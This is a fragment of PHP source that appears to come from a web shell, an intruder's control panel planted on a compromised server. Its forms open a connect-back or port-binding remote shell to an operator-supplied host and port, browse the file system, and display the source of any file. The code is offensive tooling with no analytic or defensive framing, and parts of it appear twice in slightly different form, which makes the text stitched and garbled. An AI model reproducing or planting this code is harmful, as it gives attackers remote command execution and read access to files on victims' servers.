} ############################################################################### # PHP shell handling ############################################################################### if ($phpshell == 1) { $strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>\n\t<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>\n\t<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>\n\t<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>\n\t<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>\n\t<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>\n\t<tr><td></td><td><input type=submit></td></tr>\n\t<tr><td colspan=2>"; if ($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) { $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost); } $strOutput .= "</td></tr></form></table>"; } ############################################################################### # snooping ############################################################################### if ($snoop == 1) { $strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>\n\t<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>\n\t<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>\n\t</form>\n\t</table>"; } ############################################################################### # show highlited source ############################################################################### if ($showsource == 1 | $vsource != $ArrDefaults['vsource']) { $strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>\n\t<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>\n\t<tr><td></td><td><input type=submit></td></tr>\n\t<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>\n\t</form>\n\t</table>"; } ############################################################################### # service check ############################################################################### if ($servicecheck == 1) { if ($servhost != "") { $host = $servhost; } else { $host = "localhost";
<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr> <tr><td></td><td><input type=submit></td></tr> <tr><td colspan=2>"; if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost); $strOutput .= "</td></tr></form></table>"; } ############################################################################### # snooping ############################################################################### if($snoop == 1) { $strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr> <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> <tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr> <tr><td colspan=2>" . snoopy($chdir) . "</td></tr> </form> </table>"; } ############################################################################### # show highlited source ############################################################################### if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) { $strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr> <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> <tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr> <tr><td></td><td><input type=submit></td></tr> <tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr> </form> </table>"; }